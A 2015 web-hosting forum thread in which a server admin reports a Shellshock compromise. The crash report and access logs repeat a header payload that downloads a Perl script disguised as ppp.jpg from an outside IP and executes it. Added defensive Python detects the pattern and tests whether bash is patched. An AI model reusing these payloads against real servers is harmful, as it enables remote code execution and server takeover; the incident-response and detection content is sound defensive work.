
WHM - cPanel script security folder tmp.

Discussion in 'Security' started by Morri Luca, Apr 7, 2015.

  1. Morri Luca

    Morri Luca Member

    Joined:
    Mar 19, 2015
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Italia
    cPanel Access Level:
    Root Administrator
    Hello. This morning my server went down and I received this email from my server:

    (XXXXX = my server user)

    Object : [abrt] full crash report
    Code:
    abrt_version:   2.0.8
    cmdline:        /bin/sh php4
    executable:     /bin/bash
    kernel:         2.6.32-220.13.1.el6.x86_64
    pid:            19131
    pwd:            /usr/local/cpanel/cgi-sys
    reason:         Process /bin/bash was killed by signal 11 (SIGSEGV)
    time:           Tue 07 Apr 2015 04:10:02 AM CEST
    uid:            507
    username:      XXXXXX
    
    sosreport.tar.xz: Binary file, 1777664 bytes
    
    environ:
    :PATH=/usr/local/bin:/usr/bin:/bin
    :HTTP_HOST=XXXXXX.COM
    :HTTP_CONNECTION=keep-alive
    :HTTP_CACHE_CONTROL=max-age=0
    :HTTP_USER_AGENT
    :'() { :;}; /bin/bash -c \"echo xxxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"'
    :'HTTP_COOKIE=() { :;}; /bin/bash -c \"echo xxxxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"'
    :'HTTP_REFERER=() { :;}; /bin/bash -c \"echo xxxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"'
    :HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    :HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8
    :SERVER_SIGNATURE=
    :'SERVER_SOFTWARE=Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4'
    :SERVER_NAME=xxxxxx.com
    :SERVER_ADDR=myip
    :SERVER_PORT=80
    :REMOTE_ADDR=62.149.164.193
    :DOCUMENT_ROOT=/home/xxxxxxx/public_html
    :SERVER_ADMIN=webmaster@xxxxxxx.com
    :SCRIPT_FILENAME=/usr/local/cpanel/cgi-sys/php4
    :REMOTE_PORT=51684
    :GATEWAY_INTERFACE=CGI/1.1
    :SERVER_PROTOCOL=HTTP/1.1
    :REQUEST_METHOD=GET
    :QUERY_STRING=
    :REQUEST_URI=/cgi-sys/php4
    :SCRIPT_NAME=/cgi-sys/php4
    
    limits:
    :Limit                     Soft Limit           Hard Limit           Units    
    :Max cpu time              unlimited            unlimited            seconds  
    :Max file size             unlimited            unlimited            bytes    
    :Max data size             unlimited            unlimited            bytes    
    :Max stack size            10485760             unlimited            bytes    
    :Max core file size        0                    unlimited            bytes    
    :Max resident set          unlimited            unlimited            bytes    
    :Max processes             62776                62776                processes
    :Max open files            16384                16384                files    
    :Max locked memory         65536                65536                bytes    
    :Max address space         unlimited            unlimited            bytes    
    :Max file locks            unlimited            unlimited            locks    
    :Max pending signals       62776                62776                signals  
    :Max msgqueue size         819200               819200               bytes    
    :Max nice priority         0                    0                   
    :Max realtime priority     0                    0                   
    :Max realtime timeout      unlimited            unlimited            us       
    
    maps:
    :00400000-004d4000 r-xp 00000000 fd:00 3407921                            /bin/bash
    :006d3000-006dd000 rw-p 000d3000 fd:00 3407921                            /bin/bash
    :006dd000-006e2000 rw-p 00000000 00:00 0
    :008dc000-008e5000 rw-p 000dc000 fd:00 3407921                            /bin/bash
    :0210e000-0212f000 rw-p 00000000 00:00 0                                  [heap]
    :333d800000-333d820000 r-xp 00000000 fd:00 655418                         /lib64/ld-2.12.so
    :333da1f000-333da20000 r--p 0001f000 fd:00 655418                         /lib64/ld-2.12.so
    :333da20000-333da21000 rw-p 00020000 fd:00 655418                         /lib64/ld-2.12.so
    :333da21000-333da22000 rw-p 00000000 00:00 0
    :333dc00000-333dd89000 r-xp 00000000 fd:00 655456                         /lib64/libc-2.12.so
    :333dd89000-333df88000 ---p 00189000 fd:00 655456                         /lib64/libc-2.12.so
    :333df88000-333df8c000 r--p 00188000 fd:00 655456                         /lib64/libc-2.12.so
    :333df8c000-333df8d000 rw-p 0018c000 fd:00 655456                         /lib64/libc-2.12.so
    :333df8d000-333df92000 rw-p 00000000 00:00 0
    :333e400000-333e402000 r-xp 00000000 fd:00 655645                         /lib64/libdl-2.12.so
    :333e402000-333e602000 ---p 00002000 fd:00 655645                         /lib64/libdl-2.12.so
    :333e602000-333e603000 r--p 00002000 fd:00 655645                         /lib64/libdl-2.12.so
    :333e603000-333e604000 rw-p 00003000 fd:00 655645                         /lib64/libdl-2.12.so
    :3340c00000-3340c1d000 r-xp 00000000 fd:00 655748                         /lib64/libtinfo.so.5.7
    :3340c1d000-3340e1d000 ---p 0001d000 fd:00 655748                         /lib64/libtinfo.so.5.7
    :3340e1d000-3340e21000 rw-p 0001d000 fd:00 655748                         /lib64/libtinfo.so.5.7
    :7fdfa080b000-7fdfa080e000 rw-p 00000000 00:00 0
    :7fdfa0820000-7fdfa0821000 rw-p 00000000 00:00 0
    :7fffc1456000-7fffc146b000 rw-p 00000000 00:00 0                          [stack]
    :7fffc1550000-7fffc1551000 r-xp 00000000 00:00 0                          [vdso]
    :ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
    
    open_fds:
    :0:pipe:[121610173]
    :pos:    0
    :flags:    00
    :1:pipe:[121610174]
    :pos:    0
    :flags:    01
    :2:pipe:[121610175]
    :pos:    0
    :flags:    01
    
    After I restarted the server, I found this request in the file /home/xxxx/access-logs/xxxxx.com
    Code:
    62.149.164.193 - - [07/Apr/2015:04:08:07 +0200] "GET /cgi-sys/php4 HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"echo xxxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo xxxx.COM/cgi-sys/php4 ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-sys/php4 ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
    62.149.164.193 - - [07/Apr/2015:04:07:43 +0200] "GET /cgi-bin/test-cgi HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"echo xxxxxx.COM/cgi-bin/test-cgi ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-bin/test-cgi ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo xxxxx.COM/cgi-bin/test-cgi ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/cgi-bin/test-cgi ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
    62.149.164.193 - - [07/Apr/2015:04:07:19 +0200] "GET /phppath/cgi_wrapper? HTTP/1.1" 500 - "() { :;}; /bin/bash -c \"echo xxxxx.COM/phppath/cgi_wrapper? ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/phppath/cgi_wrapper? ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\"" "() { :;}; /bin/bash -c \"echo xxxxx.COM/phppath/cgi_wrapper? ;cd /tmp;curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg; echo xxxxx.COM/phppath/cgi_wrapper? ;cd /var/spool/samba; curl -sO http://210.1.61.133/~leelawadee/model/code/ppp.jpg;wget -q http://210.1.61.133/~leelawadee/model/code/ppp.jpg;perl ppp.jpg;rm -fr ppp.jpg\""
    Then I found the file ppp.jpg in my tmp folder.
    I removed all of it.
    How do I prevent this malware? How can I do it? Thanks
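The crash report and access-log lines in this post carry the same tell-tale header value, a bash function definition (`() { :;};`) placed in the User-Agent, Referer and Cookie headers so that a CGI script that exports them as environment variables hands them to bash. The following script is an added example for readers of this thread, not the poster's code or a cPanel tool: it parses Apache combined-format log lines and abrt-style `environ:` lines, flags any header or CGI variable whose value starts with that function-definition pattern, and summarises which source addresses probed which CGI paths. All sample log and environ lines are constructed (documentation IP addresses, short placeholder commands), and the field names `ip`, `path`, `status`, `field` are this example's own.

```python
import re
from typing import Dict, List, Optional

# A bash function definition at the start of a header/env value is the
# signature a CGI-exposed bash will import; "\(\)\s*\{" catches the
# "() { :;};" variant seen above and spacing variants of it.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache combined log format. Referer and User-Agent may contain escaped
# quotes (\"), exactly as in the log lines quoted in this thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)

# Constructed sample lines shaped like the ones in the post (not real traffic).
LOG_LINES = [
    '203.0.113.5 - - [07/Apr/2015:04:00:01 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [07/Apr/2015:04:08:07 +0200] "GET /cgi-sys/php4 HTTP/1.1" 500 - '
    '"() { :;}; /bin/bash -c \\"id\\"" "() { :;}; /bin/bash -c \\"echo test\\""',
    '198.51.100.7 - - [07/Apr/2015:04:07:43 +0200] "GET /cgi-bin/test-cgi HTTP/1.1" 500 - '
    '"-" "() {:;}; /bin/bash -c \\"id\\""',
]

# Constructed sample of an abrt "environ:" section (the User-Agent value is
# printed on the line after its name, as in the crash report above).
ENVIRON_LINES = [
    ":HTTP_HOST=example.com",
    ":HTTP_USER_AGENT",
    ":'() { :;}; /bin/bash -c \"id\"'",
    ":'HTTP_COOKIE=() { :;}; /bin/bash -c \"id\"'",
    ":HTTP_ACCEPT=text/html",
    ":SCRIPT_FILENAME=/usr/local/cpanel/cgi-sys/php4",
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format log line into named fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = rec["request"].split()
    rec["path"] = parts[1] if len(parts) >= 2 else rec["request"]
    return rec


def scan_access_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per header (referer or user-agent) carrying the function-definition pattern."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("referer", "ua"):
            if SHELLSHOCK_RE.search(rec[field]):
                findings.append({"ip": rec["ip"], "path": rec["path"],
                                 "status": rec["status"], "field": field})
    return findings


def scan_cgi_environ(environ_lines: List[str]) -> List[str]:
    """Return the names of CGI environment variables whose value carries the pattern."""
    hits = []
    pending = None  # a variable name whose value abrt printed on the next line
    for raw in environ_lines:
        entry = raw.strip().lstrip(":").strip("'")
        name, sep, value = entry.partition("=")
        if not sep:
            if SHELLSHOCK_RE.search(entry):
                hits.append(pending or "<unknown>")
            else:
                pending = entry
            continue
        pending = None
        if SHELLSHOCK_RE.search(value):
            hits.append(name)
    return hits


def attacker_summary(findings: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group findings as source IP -> sorted list of CGI paths that were probed."""
    summary: Dict[str, set] = {}
    for f in findings:
        summary.setdefault(f["ip"], set()).add(f["path"])
    return {ip: sorted(paths) for ip, paths in summary.items()}


if __name__ == "__main__":
    for f in scan_access_log(LOG_LINES):
        print(f"{f['ip']} probed {f['path']} via {f['field']} (HTTP {f['status']})")
    print("tainted CGI variables:", scan_cgi_environ(ENVIRON_LINES))
    print("summary:", attacker_summary(scan_access_log(LOG_LINES)))
```

The HTTP 500 in the log is not proof the attack failed: it only means the CGI did not produce a valid response. Whether bash actually ran the trailing command is answered by the crash report (`pwd: /usr/local/cpanel/cgi-sys`, `cmdline: /bin/sh php4`, the tainted `HTTP_*` variables) and by files appearing in /tmp, which is why both sources are scanned here.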
     
  2. Morri Luca

    Morri Luca Member

    Joined:
    Mar 19, 2015
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Italia
    cPanel Access Level:
    Root Administrator
    Hello. I found the problem. This attack is called Shellshock.

    I solved the problem and fixed the system bug.

    ausweb.com.au/tutorials/2014/09/26/check-linux-server-vulnerable-shellshock/
     
    #2 Morri Luca, Apr 8, 2015
    Last edited by a moderator: Apr 8, 2015
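The linked tutorial's check is the standard one: export a function definition with a trailing command through the environment and see whether bash executes the trailing command. As an added example (not the poster's script or cPanel's tooling), this wraps that canary test so it can be run on a host after patching and reports a simple verdict; `check_bash`, `classify_bash_output` and the `x` variable name are this example's own choices, and the `bash_path` parameter lets you point it at a specific binary.

```python
import shutil
import subprocess
from typing import Optional

# Canary: a harmless function definition followed by a trailing command.
# An unpatched bash runs "echo vulnerable" while importing the function;
# a patched bash imports nothing and prints only the -c command's output.
CANARY = "() { :;}; echo vulnerable"


def classify_bash_output(stdout: str) -> str:
    """Decide from the canary's stdout whether the trailing command ran."""
    return "vulnerable" if "vulnerable" in stdout.splitlines() else "patched"


def check_bash(bash_path: Optional[str] = None, timeout: float = 10.0) -> str:
    """Run the canary against bash and return 'vulnerable', 'patched' or 'no-bash'."""
    bash = bash_path or shutil.which("bash")
    if bash is None:
        return "no-bash"
    # Minimal environment: PATH so "echo" builtins/binaries resolve, plus the canary.
    env = {"PATH": "/usr/bin:/bin", "x": CANARY}
    proc = subprocess.run(
        [bash, "-c", "echo test"],
        env=env, capture_output=True, text=True, timeout=timeout,
    )
    return classify_bash_output(proc.stdout)


if __name__ == "__main__":
    print("bash function-import check:", check_bash())
```

Run it before and after `yum update bash` (on the CentOS 6 kernel shown in the crash report) to confirm the verdict changes from `vulnerable` to `patched`. A patched bash typically also prints a warning on stderr about ignoring the function definition attempt; the example classifies on stdout only, so that warning does not affect the result.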
  3. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    44,323
    Likes Received:
    1,851
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator